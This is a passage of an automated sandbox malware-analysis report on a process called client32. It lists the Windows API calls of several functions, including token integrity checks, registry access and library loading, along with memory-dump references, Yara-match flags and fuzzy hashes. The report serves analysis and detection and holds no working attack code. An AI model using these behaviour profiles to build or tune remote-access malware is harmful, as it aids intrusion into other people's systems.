                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,687E1E32,00000001,?,00000000,00000000,00000000,?,688075BC,00000001,00000214), ref: 687E09E8
                                                                                                                                                                                                    • _errno.MSVCR100(?,687E1E32,00000001,?,00000000,00000000,00000000,?,688075BC,00000001,00000214), ref: 6880F3D7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AllocateHeap_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 242259997-0
                                                                                                                                                                                                    • Opcode ID: 1f89951594bd3b60cb572266809bb2abce226777585caa7d062bdc3e1feaa5e2
                                                                                                                                                                                                    • Instruction ID: e4c67670417cf6b0033574537d7cbcb60238b043d770846b69ba147b02f5b43d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f89951594bd3b60cb572266809bb2abce226777585caa7d062bdc3e1feaa5e2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 790192312852169FFB049E2DDD48B6B3798BFA2760F418929B8259B1D0DBB0D440CBA0
                                                                                                                                                                                                    Function 1110E3C0 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1110E3EA
                                                                                                                                                                                                    • __wsplitpath.LIBCMT ref: 1110E405
                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1110E439
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryInformationSystemVolume__wsplitpath
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 395646034-0
                                                                                                                                                                                                    • Opcode ID: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
                                                                                                                                                                                                    • Instruction ID: 49ee09b274793d3f37b85f9af0a235e2207b6666fb7fe841f2bc02eb00c982ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8bdb95155aadf7a1a8a08a2ae4519351e4b94d46eda9f59a1fcd9cf5ab2cfcd5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5911A135A4021DABEB14CB94CC42FEDF378AB48B04F1040D5E724AB1C0E7B02A08CB65
                                                                                                                                                                                                    Function 1109DCF0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD11
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,110F58B4,00000001,1113DE08,_debug,TraceCopyData,00000000,00000000,?,?,00000002,00000000), ref: 1109DD18
                                                                                                                                                                                                      • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,74DEF550,?,00000000), ref: 1109DC58
                                                                                                                                                                                                      • Part of subcall function 1109DC20: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109DC74
                                                                                                                                                                                                      • Part of subcall function 1109DC20: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,007AF420,007AF420,007AF420,007AF420,007AF420,007AF420,007AF420,111EAB1C,?,00000001,00000001), ref: 1109DCA0
                                                                                                                                                                                                      • Part of subcall function 1109DC20: EqualSid.ADVAPI32(?,007AF420,?,00000001,00000001), ref: 1109DCB3
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00000002,00000000), ref: 1109DD37
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2256153495-0
                                                                                                                                                                                                    • Opcode ID: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                                                                                    • Instruction ID: c89a6c7b331b2a9e52fe7b246e4b03132f6c449d5caf40a75acaa97b60e2562d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5599503d8057efe2b11c68c721220681cdfceea4edd7362af18e40f0ab2af1e3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71F08CB5E42319EFC705DFE5D8849AEFBB8AF09308750847DEA1AC3204D631DA009F61
                                                                                                                                                                                                    Function 1110C6B0 Relevance: 3.8, APIs: 3, Instructions: 57COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(111EC8B8,24DE4E77,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C6E4
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(111EC8B8,24DE4E77,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C700
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EC8B8,?,?,?,?,?,Function_001813A8,000000FF,?,1110C788,00000001), ref: 1110C748
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3991485460-0
                                                                                                                                                                                                    • Opcode ID: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                                                                                    • Instruction ID: 5cbfd62ab707a984bc8f9840cb1ce5c13d1e9dd1c8f4cb6af8017bccb6afb893
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 279ca6b2fbad6da154957958487355d6979f801056aa7a655149738043ae789f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC117375A01B25AFE7029F89CE88F9EFBE8EB45624F40416AF911A3740D73498008B91
                                                                                                                                                                                                    Function 11067F50 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068012
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: LibraryLoad
                                                                                                                                                                                                    • String ID: ??CTL32.DLL
                                                                                                                                                                                                    • API String ID: 1029625771-2984404022
                                                                                                                                                                                                    • Opcode ID: e5a1e62f84c08d1d43d23472a1a595ca18a9758f57363a42cce1bbd222405820
                                                                                                                                                                                                    • Instruction ID: 32b9202a4fc65b1dacbe7aa8c831b48159e18a8703659cb8720647e729342126
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e5a1e62f84c08d1d43d23472a1a595ca18a9758f57363a42cce1bbd222405820
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C431D371A04655DFE711CF59DC40F5AF7E8FB45724F0086BAE9199B380E731A900CB91
                                                                                                                                                                                                    Function 110267B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 110267DD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DriveType
                                                                                                                                                                                                    • String ID: ?:\
                                                                                                                                                                                                    • API String ID: 338552980-2533537817
                                                                                                                                                                                                    • Opcode ID: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                                                                                                    • Instruction ID: 38449473f5ed5767ddcbcf892a2d2af3f0dceeb725c671958e56149c4f091727
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e7060872956c1bafd9786653a908f37795ae8ab637c2db7226b6dae11d93418
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DF0B460C043D63AEB22CE60A84459ABFD85F062A8F54C8DEDCDC46941E1B6E188C791
                                                                                                                                                                                                    Function 110EAED0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 110EAE90: RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,24DE4E77), ref: 110EAE9D
                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,?,?,?,?,?,?,110EB538,?,?,00020019,24DE4E77), ref: 110EAEEC
                                                                                                                                                                                                      • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error %d Opening regkey %s, xrefs: 110EAEFA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseOpenwvsprintf
                                                                                                                                                                                                    • String ID: Error %d Opening regkey %s
                                                                                                                                                                                                    • API String ID: 1772833024-3994271378
                                                                                                                                                                                                    • Opcode ID: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                                                                                                    • Instruction ID: 09eb28a66f6e9341cb3e48657c7c8114af41280c10e95afb1c39da68eab11178
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe18bb417581625d487c97c6e7485a2c419efe2bbd817503b18d99af0a973be5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFE092BA701319BFD210D65A9C88FABBB5DDBC96A4F014025FA0897341D971EC4082B0
                                                                                                                                                                                                    Function 1110C4A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 1110C4D2
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcess_memsetwsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp
                                                                                                                                                                                                    • API String ID: 4120431230-2363596943
                                                                                                                                                                                                    • Opcode ID: bce583019a6b6f5728b65a1f3c6ed1eb728a479e52f27e907b7c6efb70f27a12
                                                                                                                                                                                                    • Instruction ID: fb683ad4537a29421ebad94ea8a5926084d263391e6db2c8366a4dac22183ed0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bce583019a6b6f5728b65a1f3c6ed1eb728a479e52f27e907b7c6efb70f27a12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4E08C3BE4013932C1A1248A7C42FABFA5C4B92AA8F050021FD18A6211A545660181E6
                                                                                                                                                                                                    Function 110EAE90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,110EAEDD,?,?,?,?,110EB538,?,?,00020019,24DE4E77), ref: 110EAE9D
                                                                                                                                                                                                      • Part of subcall function 110EAC60: wvsprintfA.USER32(?,?,?), ref: 110EAC8B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Error %d closing regkey %x, xrefs: 110EAEAD
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
